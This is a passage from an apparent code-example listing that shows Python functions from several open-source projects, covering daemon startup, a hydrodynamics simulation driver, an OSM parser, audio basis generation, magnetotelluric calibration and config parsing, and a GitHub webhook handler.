utils.CloseFDs(noclose_fds=noclose_fds)
(wpipe, stdio_reopen_fn) = utils.Daemonize(logfile=log_filename)
else:
(wpipe, stdio_reopen_fn) = (None, None)
log_reopen_fn = \
utils.SetupLogging(log_filename, daemon_name,
debug=options.debug,
stderr_logging=not options.fork,
multithreaded=multithreaded,
syslog=options.syslog,
console_logging=console_logging)
# Reopen log file(s) on SIGHUP
signal.signal(signal.SIGHUP,
compat.partial(_HandleSigHup, [log_reopen_fn, stdio_reopen_fn]))
try:
utils.WritePidFile(utils.DaemonPidFileName(daemon_name))
except errors.PidFileLockError, err:
print >> sys.stderr, "Error while locking PID file:\n%s" % err
sys.exit(constants.EXIT_FAILURE)
try:
try:
logging.info("%s daemon startup", daemon_name)
if callable(prepare_fn):
prep_results = prepare_fn(options, args)
else:
prep_results = None
except Exception, err:
utils.WriteErrorToFD(wpipe, _BeautifyError(err))
raise
if wpipe is not None:
# we're done with the preparation phase, we close the pipe to
# let the parent know it's safe to exit
os.close(wpipe)
exec_fn(options, args, prep_results)
finally:
utils.RemoveFile(utils.DaemonPidFileName(daemon_name))
0
Example 86
Project: pyro2 Source File: pyro.py
def doit(solver_name, problem_name, param_file,
other_commands=None,
comp_bench=False, make_bench=False):
msg.bold('pyro ...')
tc = profile.TimerCollection()
tm_main = tc.timer("main")
tm_main.begin()
# import desired solver under "solver" namespace
solver = importlib.import_module(solver_name)
#-------------------------------------------------------------------------
# runtime parameters
#-------------------------------------------------------------------------
# parameter defaults
rp = runparams.RuntimeParameters()
rp.load_params("_defaults")
rp.load_params(solver_name + "/_defaults")
# problem-specific runtime parameters
rp.load_params(solver_name + "/problems/_" + problem_name + ".defaults")
# now read in the inputs file
if not os.path.isfile(param_file):
# check if the param file lives in the solver's problems directory
param_file = solver_name + "/problems/" + param_file
if not os.path.isfile(param_file):
msg.fail("ERROR: inputs file does not exist")
rp.load_params(param_file, no_new=1)
# and any commandline overrides
if other_commands is not None:
rp.command_line_params(other_commands)
# write out the inputs.auto
rp.print_paramfile()
#-------------------------------------------------------------------------
# initialization
#-------------------------------------------------------------------------
# initialize the Simulation object -- this will hold the grid and
# data and know about the runtime parameters and which problem we
# are running
sim = solver.Simulation(solver_name, problem_name, rp, timers=tc)
sim.initialize()
sim.preevolve()
#-------------------------------------------------------------------------
# evolve
#-------------------------------------------------------------------------
verbose = rp.get_param("driver.verbose")
plt.ion()
sim.cc_data.t = 0.0
# output the 0th data
basename = rp.get_param("io.basename")
sim.cc_data.write("{}{:04d}".format(basename, sim.n))
dovis = rp.get_param("vis.dovis")
if dovis:
plt.figure(num=1, figsize=(8, 6), dpi=100, facecolor='w')
sim.dovis()
while not sim.finished():
# fill boundary conditions
sim.cc_data.fill_BC_all()
# get the timestep
sim.compute_timestep()
# evolve for a single timestep
sim.evolve()
if verbose > 0: print("%5d %10.5f %10.5f" % (sim.n, sim.cc_data.t, sim.dt))
# output
if sim.do_output():
if verbose > 0: msg.warning("outputting...")
basename = rp.get_param("io.basename")
sim.cc_data.write("{}{:04d}".format(basename, sim.n))
# visualization
if dovis:
tm_vis = tc.timer("vis")
tm_vis.begin()
sim.dovis()
store = rp.get_param("vis.store_images")
if store == 1:
basename = rp.get_param("io.basename")
plt.savefig("{}{:04d}.png".format(basename, sim.n))
tm_vis.end()
tm_main.end()
#-------------------------------------------------------------------------
# benchmarks (for regression testing)
#-------------------------------------------------------------------------
# are we comparing to a benchmark?
if comp_bench:
compare_file = "{}/tests/{}{:04d}".format(
solver_name, basename, sim.n)
msg.warning("comparing to: {} ".format(compare_file))
try: bench_grid, bench_data = patch.read(compare_file)
except:
msg.warning("ERROR openning compare file")
return "ERROR openning compare file"
result = compare.compare(sim.cc_data.grid, sim.cc_data,
bench_grid, bench_data)
if result == 0:
msg.success("results match benchmark\n")
else:
msg.warning("ERROR: " + compare.errors[result] + "\n")
# are we storing a benchmark?
if make_bench:
if not os.path.isdir(solver_name + "/tests/"):
try: os.mkdir(solver_name + "/tests/")
except:
msg.fail("ERROR: unable to create the solver's tests/ directory")
bench_file = solver_name + "/tests/" + basename + "%4.4d" % (sim.n)
msg.warning("storing new benchmark: {}\n".format(bench_file))
sim.cc_data.write(bench_file)
#-------------------------------------------------------------------------
# final reports
#-------------------------------------------------------------------------
if verbose > 0: rp.print_unused_params()
if verbose > 0: tc.report()
sim.finalize()
if comp_bench:
return result
else:
return None
0
Example 87
Project: QuickOSM Source File: osm_parser.py
def parse(self):
"""
Start parsing the osm file
"""
# Configuration for OGR
gdal.SetConfigOption('OSM_CONFIG_FILE', self._osm_conf)
gdal.SetConfigOption('OSM_USE_CUSTOM_INDEXING', 'NO')
if not isfile(self.__osmFile):
raise GeoAlgorithmExecutionException("File doesn't exist")
uri = self.__osmFile + "|layername="
layers = {}
# If loadOnly, no parsing required:
# It's used only when we ask to open an osm file
if self.__loadOnly:
file_name = basename(self.__osmFile)
for layer in self.__layers:
layers[layer] = QgsVectorLayer(
uri + layer, file_name + " " + layer, "ogr")
if not layers[layer].isValid():
print "Error on the layer", layers[layer].lastError()
return layers
# Check if the order is node before way,relation
# We don't check way before relation,
# because we can have only nodes and relations
with open(self.__osmFile) as f:
for line in f:
if re.search(r'node', line):
break
if re.search(r'(way|relation)', line):
raise WrongOrderOSMException
# Foreach layers
for layer in self.__layers:
self.signalText.emit(tr("QuickOSM", u"Parsing layer : " + layer))
layers[layer] = {}
# Reading it with a QgsVectorLayer
layers[layer]['vectorLayer'] = QgsVectorLayer(
uri + layer, "test_" + layer, "ogr")
if not layers[layer]['vectorLayer'].isValid():
msg = "Error on the layer : " + \
layers[layer]['vectorLayer'].lastError()
raise GeoAlgorithmExecutionException(msg)
layers[layer]['vectorLayer'].setProviderEncoding('UTF-8')
# Set some default tags
layers[layer]['tags'] = ['full_id', 'osm_id', 'osm_type']
# Save the geometry type of the layer
layers[layer]['geomType'] = layers[layer]['vectorLayer'].wkbType()
# Set a featureCount
layers[layer]['featureCount'] = 0
# Get the other_tags
fields = layers[layer]['vectorLayer'].pendingFields()
field_names = [field.name() for field in fields]
other_tags_index = field_names.index('other_tags')
features = layers[layer]['vectorLayer'].getFeatures()
for i, feature in enumerate(features):
layers[layer]['featureCount'] += 1
# Improve the parsing if comma in whitelist,
# we skip the parsing of tags, but featureCount is needed
if self.__whiteListColumn[layer] == ',':
continue
# Get the "others_tags" field
attributes = feature.attributes()[other_tags_index]
if attributes:
h_store = pghstore.loads(attributes)
for key in h_store:
if key not in layers[layer]['tags']:
# If the key in OSM is not already in the table
if self.__whiteListColumn[layer]:
if key in self.__whiteListColumn[layer]:
layers[layer]['tags'].append(key)
else:
layers[layer]['tags'].append(key)
percent = int(100 / len(self.__layers) * (i + 1))
self.signalPercentage.emit(percent)
# Delete empty layers if this option is set to True
if self.__deleteEmptyLayers:
delete_layers = []
for keys, values in layers.iteritems():
if values['featureCount'] < 1:
delete_layers.append(keys)
for layer in delete_layers:
del layers[layer]
# Creating GeoJSON files for each layers
for layer in self.__layers:
msg = tr("QuickOSM", u"Creating GeoJSON file : " + layer)
self.signalText.emit(msg)
self.signalPercentage.emit(0)
# Creating the temp file
tf = tempfile.NamedTemporaryFile(
delete=False, suffix="_" + layer + ".geojson")
layers[layer]['geojsonFile'] = tf.name
tf.flush()
tf.close()
# Adding the attribute table
fields = QgsFields()
for key in layers[layer]['tags']:
fields.append(QgsField(key, QVariant.String))
encoding = get_default_encoding()
file_writer = QgsVectorFileWriter(
layers[layer]['geojsonFile'],
encoding,
fields,
layers[layer]['geomType'],
layers[layer]['vectorLayer'].crs(),
'GeoJSON')
# Foreach feature in the layer
features = layers[layer]['vectorLayer'].getFeatures()
for i, feature in enumerate(features):
fet = QgsFeature()
fet.setGeometry(feature.geometry())
new_attributes = []
attributes = feature.attributes()
if layer in ['points', 'lines', 'multilinestrings']:
if layer == 'points':
osm_type = "node"
elif layer == 'lines':
osm_type = "way"
elif layer == 'multilinestrings':
osm_type = 'relation'
new_attributes.append(
self.DIC_OSM_TYPE[osm_type] + str(attributes[0]))
new_attributes.append(attributes[0])
new_attributes.append(osm_type)
if attributes[1]:
h_store = pghstore.loads(attributes[1])
for tag in layers[layer]['tags'][3:]:
if unicode(tag) in h_store:
new_attributes.append(h_store[tag])
else:
new_attributes.append("")
fet.setAttributes(new_attributes)
file_writer.addFeature(fet)
elif layer == 'multipolygons':
if attributes[0]:
osm_type = "relation"
new_attributes.append(
self.DIC_OSM_TYPE[osm_type] + str(attributes[0]))
new_attributes.append(str(attributes[0]))
else:
osm_type = "way"
new_attributes.append(
self.DIC_OSM_TYPE[osm_type] + str(attributes[1]))
new_attributes.append(attributes[1])
new_attributes.append(osm_type)
h_store = pghstore.loads(attributes[2])
for tag in layers[layer]['tags'][3:]:
if unicode(tag) in h_store:
new_attributes.append(h_store[tag])
else:
new_attributes.append("")
fet.setAttributes(new_attributes)
file_writer.addFeature(fet)
percentage = int(
100 / layers[layer]['featureCount'] * (i + 1))
self.signalPercentage.emit(percentage)
del file_writer
return layers
0
Example 88
Project: pyfasst Source File: separateLeadFunctions.py
def generate_WF0_TR_chirped(transform, minF0, maxF0, stepNotes=4,
Ot=0.5, perF0=1,
depthChirpInSemiTone=0.5, loadWF0=True,
verbose=False):
"""\
Generates a 'basis' matrix for the source part WF0, using the
source model KLGLOTT88, with the following I/O arguments:
Inputs:
:param minF0:
the minimum value for the fundamental
frequency (F0)
:param maxF0:
the maximum value for F0
:param cqtfmax: ...
:param Fs: the desired sampling rate
:param Nfft:
the number of bins to compute the Fourier
transform
:param stepNotes:
the number of F0 per semitone
:param lengthWindow:
the size of the window for the Fourier
transform
:param Ot:
the glottal opening coefficient for
KLGLOTT88
:param perF0:
the number of chirps considered per F0
value
:param depthChirpInSemiTone:
the maximum value, in semitone, of the
allowed chirp per F0
Outputs:
:returns:
* `F0Table` -
the vector containing the values of the fundamental
frequencies in Hertz (Hz) corresponding to the
harmonic combs in WF0, i.e. the columns of WF0
* `WF0` -
the basis matrix, where each column is a harmonic comb
generated by KLGLOTT88 (with a sinusoidal model, then
transformed into the spectral domain)
Notes:
20120828T2358 Horribly slow...
"""
if hasattr(transform, 'octaveNr'):
lengthWindow = (
transform.cqtkernel.FFTLen * (2**(transform.octaveNr-1)))
elif hasattr(transform, 'cqtkernel'):
lengthWindow = transform.cqtkernel.linFTLen
else:
try:
lengthWindow = (transform.freqbins - 1) * 2 * 2 # just to be sure
except AttributeError:
raise AttributeError(
'There is something utterly wrong with the desired '+
'TF representation...\n'+
'No freqbins attribute!')
# generating a filename to keep data:
attributesToKeep = ('fmin', 'fmax', 'bins', 'fs', 'winFunc',
'freqbins', 'atomHopFactor')
attributes = [(k.lower()+'-'+str(v) if (k in attributesToKeep and
np.isscalar(v)) else
v.__name__ if (k in attributesToKeep and
type(v)==type(lambda x:x)) else
'') for k,v in transform.__dict__.items()]
significantAttributes = [] # keeping only non-empty attributes
for att in attributes:
if att != '':
significantAttributes.append(att)
attributes = significantAttributes
attributes.sort()
print attributes #DEBUG
filename = str('').join(['wf0_%s_' %transform.transformname,
'_minF0-', str(minF0),
'_maxF0-', str(maxF0),
'_stepNotes-', str(int(stepNotes)),
'_Ot-', str(Ot),
'_perF0-', str(int(perF0)),
'_depthChirp-', str(depthChirpInSemiTone),
'_lengthWindow-%d' %lengthWindow,
'_', str('_').join(attributes),
'.npz'])
#filename = str('').join(['wf0_%s_' %transform.transformname,
# '_', str('_').join(attributes),
# '.npz'])
##np.savez(filename, test=None) # to check size of filename on write
# print len(filename), filename #DEBUG
if os.path.isfile(filename) and loadWF0:
print "Reading WF0 and F0Table from stored arrays in %s." %filename
struc = np.load(filename)
return struc['F0Table'], struc['WF0'], struc['tft'].tolist()
else:
print "No such file: %s." %filename
print "First time WF0 computed with these parameters, please wait..."
# converting to double arrays:
minF0=np.double(minF0)
maxF0=np.double(maxF0)
Fs=np.double(transform.fs)
stepNotes=np.double(stepNotes)
if hasattr(transform, 'cqtkernel'):
if hasattr(transform.cqtkernel, 'linFTLen'):
Nfft = transform.cqtkernel.linFTLen
else:
Nfft = transform.cqtkernel.FFTLen
else:
Nfft = (transform.freqbins - 1) * 2
analysisWindow = transform.winFunc(lengthWindow)
# computing the F0 table:
numberOfF0 = np.ceil(12.0 * stepNotes * np.log2(maxF0 / minF0)) + 1
F0Table = minF0 * (2 ** (np.arange(numberOfF0,dtype=np.double) \
/ (12 * stepNotes)))
numberElementsInWF0 = numberOfF0 * perF0
# computing the desired WF0 matrix
WF0 = np.zeros([transform.freqbins,
numberElementsInWF0],
dtype=np.double)
# slow... try faster : concatenate the odgd, compute one big cqt of that
# result and extract only the desired frames:
##odgds = np.array([])
for fundamentalFrequency in np.arange(numberOfF0):
if verbose>0:
print " f0 n.", fundamentalFrequency+1, "/", numberOfF0
odgd, odgdSpec = \
generate_ODGD_spec(F0Table[fundamentalFrequency], Fs, \
Ot=Ot, lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0,\
analysisWindowType=analysisWindow)
transform.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((transform.datalen_init / 2.
- transform.time_stamps)**2)
if verbose>1: print midindex, transform.transfo.shape, WF0.shape
WF0[:,fundamentalFrequency * perF0] = np.abs(
transform.transfo[:,midindex])**2
# del mqt.transfo # maybe needed but might slow down even more...
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##print odgds.shape, odgd.shape
if verbose>10: # super debug
import matplotlib.pyplot as plt
plt.ion()
plt.figure(111)
plt.clf()
plt.imshow(np.log(np.abs(transform.transfo)**2))
raw_input('ayayay')
for chirpNumber in np.arange(perF0 - 1):
F2 = F0Table[fundamentalFrequency] \
* (2 ** ((chirpNumber + 1.0) * depthChirpInSemiTone \
/ (12.0 * (perF0 - 1.0))))
# F0 is the mean of F1 and F2.
F1 = 2.0 * F0Table[fundamentalFrequency] - F2
odgd, odgdSpec = \
generate_ODGD_spec_chirped(F1, F2, Fs, \
Ot=Ot, \
lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0)
transform.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((transform.datalen_init / 2.
- transform.time_stamps)**2)
WF0[:,fundamentalFrequency * perF0 + chirpNumber + 1] = \
np.abs(transform.transfo[:,midindex]) ** 2
# del mqt.transfo # idem
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##hybt.computeHybrid(data=odgds)
##midindex = np.argmin((lengthWindow / 2. + lengthWindow
## * np.vstack(np.arange(numberElementsInWF0))
## - hybt.time_stamps)**2, axis=1)
##if verbose>1: print midindex
##WF0 = np.abs(hybt.spCQT[:,midindex]) ** 2
np.savez(filename, F0Table=F0Table, WF0=WF0, tft=transform)
return F0Table, WF0, transform #, hybt, odgds
0
Example 89
Project: mtpy Source File: calibration.py
def calibrate_file(filename, outdir, instrument, instrument_amplification,
logger, gain, dipole, stationname, channel, latitude,
longitude, elevation, offset = 0 ):
"""
Calibrate data from one given file and store the output to another file.
If the channel is not given explicitly, it's taken from the filename suffix.
E field values will be present in microvolt/meter
B fields are given in nanotesla
input:
- data file name
- foldername for saving the output
- instrument type
- instrument amplification factor
- data logger type
- logger gain factor
- station name
- channel
"""
time_axis = None
if not instrument.lower() in list_of_instruments:
raise MTex.MTpyError_inputarguments('instrument type not known')
if not logger.lower() in list_of_loggers:
raise MTex.MTpyError_inputarguments('data logger type not known')
if not op.isfile(filename):
raise MTex.MTpyError_inputarguments('data file not existing')
infile_base = op.basename(filename)
try:
data_in = np.loadtxt(filename)
except:
raise MTex.MTpyError_inputarguments('cannot read data file')
data_out = copy.copy(data_in)
#read in first line of input file, checking, if header line exists
FH = open(filename,'r')
firstline = FH.readline().strip()
FH.close()
if np.size(data_in.shape) > 1:
if data_in.shape[1] > 1:
#at least 2 columns - assume, first is time, second data - ignore, if there are more
time_axis = data_in[:,0]
data_in = data_in[:,1]
if not op.isdir(outdir):
try:
os.makedirs(outdir)
except:
raise MTex.MTpyError_inputarguments('output directory is not '
'existing and cannot be generated')
if channel == None:
channel = filename[-2:].lower()
if not channel in list_of_channels:
raise MTex.MTpyError_inputarguments('wrong channel specification')
field = channel[0]
#print 'channel:...........',channel, field
#print 'read file',filename ,'wrote file...'
#return
#separate way for B and E fields here:
if field == 'e':
if dipole <= 1:
print 'Check dipole length value ! - It is highly improbable to '\
'have a 1 meter dipole!!'
answer = raw_input('\t\tContinue anyway? [y/N] \n')
if not answer[0].lower() == 'y':
sys.exit('Calibration process interrupted by user input!')
instrument = 'electrodes'
logger = logger.lower()
if logger == 'elogger':
if not type(gain) in [float, int]:#list_of_elogger_gain_factors:
raise MTex.MTpyError_inputarguments('invalid gain for elogger:'
' {0}'.format(gain))
#instrument_amplification = dict_of_efield_amplification[logger]
outfile_data = elogger_e_field(data_in, gain, dipole,
instrument_amplification)
elif logger == 'edl':
if not type(gain) in [float, int, str]:
raise MTex.MTpyError_inputarguments('invalid gain for EDL: '
'{0}'.format(gain))
#instrument_amplification = dict_of_efield_amplification[logger]
if type(gain) == str:
EDLgain = dict_of_EDL_gain_factors[gain]
else:
EDLgain = float(gain)
outfile_data = EDL_e_field(data_in, EDLgain, dipole,
instrument_amplification)
dataunit ='microvoltpermeter'
#B-field part
elif field == 'b':
instrument = instrument.lower()
if not instrument in list_of_bfield_instruments:
raise MTex.MTpyError_inputarguments('invalid instrument for B-'
'field measurements')
logger = logger.lower()
if not logger in list_of_bfield_loggers:
raise MTex.MTpyError_inputarguments('invalid logger for B-field'
' measurements')
#instrument_amplification = 1.
#calibration_factor = dict_of_calibration_factors_volt2nanotesla[instrument]
if logger == 'edl':
if not type(gain) in [float,int,str]:
raise MTex.MTpyError_inputarguments('invalid gain: '
'{0}'.format(gain))
if type(gain) == str:
EDLgain = dict_of_EDL_gain_factors[gain]
else:
EDLgain = float(gain)
if instrument == 'fluxgate' and channel == 'bz':
instrument_amplification *= dict_of_bz_instrument_amplification[logger]
outfile_data = EDL_b_field(data_in, EDLgain, instrument,
instrument_amplification)
dataunit = 'nanotesla'
newbasename = '{0}_{1}.{2}'.format(op.splitext(infile_base)[0], dataunit,
infile_base.split('.')[-1].lower())
#set up output file
outfile = op.join(outdir, newbasename)
additional_header_info = ' {0} {1:02.5f} {2:03.5f} {3:.1f} \n'.format(
dataunit, latitude, longitude, elevation)
if firstline[0][0] == '#':
newfirstline = firstline + additional_header_info
else:
newfirstline = '# {0} {1} {2}'.format(stationname, channel,
additional_header_info)
if time_axis != None:
data_out[:,1] = outfile_data
else:
data_out = outfile_data
Fout = open(outfile,'w')
Fout.write(newfirstline)
np.savetxt(Fout,data_out,fmt='%.8e')
Fout.close()
print 'read file',filename ,' -> wrote file %s'%(outfile)
0
Example 90
Project: python-github-webhooks Source File: webhooks.py
@application.route('/', methods=['GET', 'POST'])
def index():
"""
Main WSGI application entry.
"""
path = normpath(abspath(dirname(__file__)))
# Only POST is implemented
if request.method != 'POST':
abort(501)
# Load config
with open(join(path, 'config.json'), 'r') as cfg:
config = loads(cfg.read())
hooks = config.get('hooks_path', join(path, 'hooks'))
# Allow Github IPs only
if config.get('github_ips_only', True):
src_ip = ip_address(
u'{}'.format(request.remote_addr) # Fix stupid ipaddress issue
)
whitelist = requests.get('https://api.github.com/meta').json()['hooks']
for valid_ip in whitelist:
if src_ip in ip_network(valid_ip):
break
else:
abort(403)
# Enforce secret
secret = config.get('enforce_secret', '')
if secret:
# Only SHA1 is supported
header_signature = request.headers.get('X-Hub-Signature')
if header_signature is None:
abort(403)
sha_name, signature = header_signature.split('=')
if sha_name != 'sha1':
abort(501)
# HMAC requires the key to be bytes, but data is string
mac = hmac.new(str(secret), msg=request.data, digestmod=sha1)
# Python prior to 2.7.7 does not have hmac.compare_digest
if hexversion >= 0x020707F0:
if not hmac.compare_digest(str(mac.hexdigest()), str(signature)):
abort(403)
else:
# What compare_digest provides is protection against timing
# attacks; we can live without this protection for a web-based
# application
if not str(mac.hexdigest()) == str(signature):
abort(403)
# Implement ping
event = request.headers.get('X-GitHub-Event', 'ping')
if event == 'ping':
return dumps({'msg': 'pong'})
# Gather data
try:
payload = loads(request.data)
except:
abort(400)
# Determining the branch is tricky, as it only appears for certain event
# types an at different levels
branch = None
try:
# Case 1: a ref_type indicates the type of ref.
# This true for create and delete events.
if 'ref_type' in payload:
if payload['ref_type'] == 'branch':
branch = payload['ref']
# Case 2: a pull_request object is involved. This is pull_request and
# pull_request_review_comment events.
elif 'pull_request' in payload:
# This is the TARGET branch for the pull-request, not the source
# branch
branch = payload['pull_request']['base']['ref']
elif event in ['push']:
# Push events provide a full Git ref in 'ref' and not a 'ref_type'.
branch = payload['ref'].split('/')[2]
except KeyError:
# If the payload structure isn't what we expect, we'll live without
# the branch name
pass
# All current events have a repository, but some legacy events do not,
# so let's be safe
name = payload['repository']['name'] if 'repository' in payload else None
meta = {
'name': name,
'branch': branch,
'event': event
}
logging.info('Metadata:\n{}'.format(dumps(meta)))
# Possible hooks
scripts = []
if branch and name:
scripts.append(join(hooks, '{event}-{name}-{branch}'.format(**meta)))
if name:
scripts.append(join(hooks, '{event}-{name}'.format(**meta)))
scripts.append(join(hooks, '{event}'.format(**meta)))
scripts.append(join(hooks, 'all'))
# Check permissions
scripts = [s for s in scripts if isfile(s) and access(s, X_OK)]
if not scripts:
return ''
# Save payload to temporal file
osfd, tmpfile = mkstemp()
with fdopen(osfd, 'w') as pf:
pf.write(dumps(payload))
# Run scripts
ran = {}
for s in scripts:
proc = Popen(
[s, tmpfile, event],
stdout=PIPE, stderr=PIPE
)
stdout, stderr = proc.communicate()
ran[basename(s)] = {
'returncode': proc.returncode,
'stdout': stdout,
'stderr': stderr,
}
# Log errors if a hook failed
if proc.returncode != 0:
logging.error('{} : {} \n{}'.format(
s, proc.returncode, stderr
))
# Remove temporal file
remove(tmpfile)
info = config.get('return_scripts_info', False)
if not info:
return ''
output = dumps(ran, sort_keys=True, indent=4)
logging.info(output)
return output
0
Example 91
Project: mtpy Source File: configfile.py
def read_survey_configfile(filename):
"""
Read in a survey configuration file and return a dictionary.
Input config file must contain station names as section headers!
The output dictionary keys are station names (capitalised),
the values are (sub-)dictionaries. The configuration file must contain
sections for all stations, each containing all mandatory keywords:
- latitude (deg)
- longitude (deg)
- elevation (in meters)
- sampling_interval (in seconds)
- station_type (MT, (Q)E, (Q)B)
Not mandatory, but recommended
- declination (in degrees, positive to East) - this is set to '0.0', if omitted
Depending on the type of station the following entries are required.
E-field recorded:
- E_logger_type ('edl'/'elogger'/'qel')
- E_logger_gain (factor/gain-level)
- E_instrument_type ('electrodes'/'dipole')
- E_instrument_amplification (applied amplification factor)
- E_Xaxis_azimuth (degrees)
- E_Xaxis_length (in meters)
- E_Yaxis_azimuth (degrees)
- E_Yaxis_length (in meters)
B-field recorded:
- B_logger_type ('edl'/'qel_blogger')
- B_logger_gain (factor/gain level)
- B_instrument_type ('coil(s)', 'fluxgate')
- B_instrument_amplification (applied amplification factor)
- B_Xaxis_azimuth (degrees)
- B_Yaxis_azimuth (degrees)
A global section can be used to include parameters for all stations.
The name of the section must be one of:
global/main/default/general
"""
error_counter = 0
#generate config parser instance
configobject = ConfigParser.ConfigParser()
#check, if file is present
if not op.isfile(filename):
raise MTex.MTpyError_inputarguments( 'File does not'
' exist: {0}'.format(filename) )
# try to parse file - exit, if not a config file
try:
configobject.read(filename)
except:
raise MTex.MTpyError_inputarguments( 'File is not a '
'proper configuration file: {0}'.format(filename) )
#obtain dict of dicts containing the input file's sections (station names)
#excludes DEFAULT section and key-value pairs without section header
configobject_dict = configobject._sections
#initialise the output dictionary
config_dict = {}
#loop over the sections (stations) of the config file
for station in configobject_dict:
#read in the sub-dictionary for the current station - bringing all keys
#to lowercase!
temp_dict_in = dict((k.lower(),v.lower())
for k, v in configobject_dict[station].items())
#initialise output sub-directory for current station
stationdict = temp_dict_in
#stationnames are uppercase in MTpy
stationname = station.upper()
if stationname in ['GLOBAL','MAIN','DEFAULT','GENERAL']:
stationname = 'GLOBAL'
stationdict['station'] = stationname
#add the station's sub-dictionary to the config dictionary
config_dict[stationname] = stationdict
# Check if a global section is present
if config_dict.has_key('GLOBAL'):
globaldict = config_dict['GLOBAL']
else:
#set defaults for location
globaldict={}
# for i in ['latitude', 'longitude', 'elevation']:
# #skip if values are present
# if i in globaldict.keys() or i[:3] in globaldict.keys():
# continue
# #otherwise set defaults
# globaldict[i] = 0
#remove other general sections to avoid redundancy
for i in ['MAIN','DEFAULT','GENERAL']:
if config_dict.has_key(i):
dummy = config_dict.pop(i)
# RE-loop to check for each station if required keywords are present,
# if not if they can be pulled from the global section
#============================================================
# local function definition
def fromglobals(key,stationdict,globaldict):
"""
Check if stationdict contains key.
If not search for key in global dict and add it to station dict.
Return if global dict is not defined.
Return True if key was present in either dictionary, False if not.
"""
if key in stationdict.keys():
return True, stationdict.get(key)
if globaldict is None or len(globaldict) == 0:
return False, None
if key in globaldict:
stationdict[key] = globaldict[key]
return True,globaldict.get(key)
return False, None
#============================================================
for station in sorted(config_dict):
#do not alter the global section
if station == 'GLOBAL':
continue
stationdict = config_dict[station]
#check for presence of all mandatory keywords for the current station
#case insensitive - allow for short forms 'sampling', 'lat', 'lon', and 'elev'
for idx,req_keyword in enumerate(list_of_required_keywords):
shortform = list_of_required_keywords_short[idx]
try:
found = False
#import ipdb
#ipdb.set_trace()
if fromglobals(req_keyword,stationdict,globaldict)[0] is False:
#try short form instead
found,value = fromglobals(shortform,stationdict,globaldict)
#print shortform,value
if found is True:
stationdict[req_keyword] = value
else:
found = True
if found is False:
print 'Station {0} - keyword {1} missing'.format(stationname,
req_keyword)
error_counter += 1
raise Exception
if req_keyword in ['elevation','latitude', 'longitude']:
#check format of lat/lon - convert to degrees, if given in
#(deg,min,sec)-triple#assert correct format
value = stationdict[req_keyword]
try:
new_value = MTft._assert_position_format(req_keyword,value)
except:
raise MTex.MTpyError_config_file('Error - wrong '
'coordinate format for station {0}'.format(stationname))
stationdict[req_keyword] = new_value
except:
raise
print 'Missing information on station {0} in config file'\
' - setting default (dummy) value'.format(station)
stationdict[req_keyword] = list_of_keyword_defaults_general[idx]
#to avoid duplicates remove the now obsolete short form from
#the station dictionary
dummy = stationdict.pop(shortform,None)
if not stationdict['station_type'] in list_of_station_types:
raise MTex.MTpyError_config_file( 'Station type not valid' )
if stationdict['station_type'] in ['mt','e']:
#check for required electric field parameters - not done for QEL loggers yet
for req_keyword in list_of_efield_keywords:
if req_keyword.lower() in temp_dict_in.keys():
stationdict[req_keyword.lower()] = \
temp_dict_in[req_keyword.lower()].lower()
else:
print 'Station {0} - keyword {1} missing'.format(stationname,
req_keyword)
error_counter += 1
continue
_validate_dictionary(stationdict,dict_of_allowed_values_efield)
if stationdict['station_type'] in ['mt','b']:
#check for required magnetic field parameters
for req_keyword in list_of_bfield_keywords:
if req_keyword.lower() in temp_dict_in.keys():
stationdict[req_keyword.lower()] = \
temp_dict_in[req_keyword.lower()].lower()
else:
print 'Station {0} - keyword {1} missing'.format(stationname,
req_keyword)
error_counter += 1
continue
_validate_dictionary(stationdict,dict_of_allowed_values_bfield)
#re-loop for setting up correct remote reference station information :
#if rem.ref. station key is present, its information must be contained
#in the same config file!
for station in config_dict.iterkeys():
stationdict = config_dict[station]
if not stationdict.has_key('rr_station'):
continue
#stationdict['rr_station'] = None
stationdict['rr_station_latitude'] = None
stationdict['rr_station_longitude'] = None
stationdict['rr_station_elevation'] = None
rem_station = stationdict['rr_station']
try:
#check, if values are contained in dict
float(stationdict['rr_station_latitude'] )
float(stationdict['rr_station_longitude'])
float(stationdict['rr_station_elevation'])
except:
try:
#check for shortened form
stationdict['rr_station_latitude'] = float(
stationdict['rr_station_lat'] )
stationdict['rr_station_longitude'] = float(
stationdict['rr_station_lon'] )
stationdict['rr_station_elevation'] = float(
stationdict['rr_station_ele'] )
except:
try:
#read from other config dict entry
stationdict['rr_station_latitude'] = \
config_dict[rem_station]['latitude']
stationdict['rr_station_longitude'] = \
config_dict[rem_station]['longitude']
stationdict['rr_station_elevation'] = \
config_dict[rem_station]['elevation']
except:
#if finally failed to read rr_station info,\
#set rr_station back to None
stationdict['rr_station'] = None
stationdict['rr_station_latitude'] = None
stationdict['rr_station_longitude'] = None
stationdict['rr_station_elevation'] = None
#check consistency of coordinates, if rr_station is present
if stationdict['rr_station'] != None:
try:
stationdict['rr_station_latitude'] = \
MTft._assert_position_format(
'latitude',stationdict['rr_station_latitude'])
stationdict['rr_station_longitude'] = \
MTft._assert_position_format(
'longitude',stationdict['rr_station_longitude'])
stationdict['rr_station_elevation'] = \
MTft._assert_position_format(
'elevation',stationdict['rr_station_elevation'])
except:
print 'Problem with remote reference station ({0}) -'
' remote reference ({1}) coordinates invalid -'
' remote reference set to None'.format(station,
stationdict['rr_station'])
stationdict['rr_station'] = None
stationdict['rr_station_latitude'] = None
stationdict['rr_station_longitude'] = None
stationdict['rr_station_elevation'] = None
if error_counter != 0:
print 'Could not read all mandatory sections and options'\
' in config file - found {0} errors - check configuration'\
' file before continue!'.format(error_counter)
answer = 5
while not answer in ['y','n']:
answer = raw_input('\n\tDo you want to continue anyway? (y/n)')
try:
answer = answer.strip().lower()[0]
except:
continue
if answer == 'n':
print
sys.exit()
print
return config_dict
0
Example 92
Project: VisTrails Source File: init.py
def class_dict(base_module, node):
"""class_dict(base_module, node) -> dict
Returns the class dictionary for the module represented by node and
with base class base_module"""
class_dict_ = {}
def update_dict(name, callable_):
if class_dict_.has_key(name):
class_dict_[name] = callable_(class_dict_[name])
elif hasattr(base_module, name):
class_dict_[name] = callable_(getattr(base_module, name))
else:
class_dict_[name] = callable_(None)
def guarded_SimpleScalarTree_wrap_compute(old_compute):
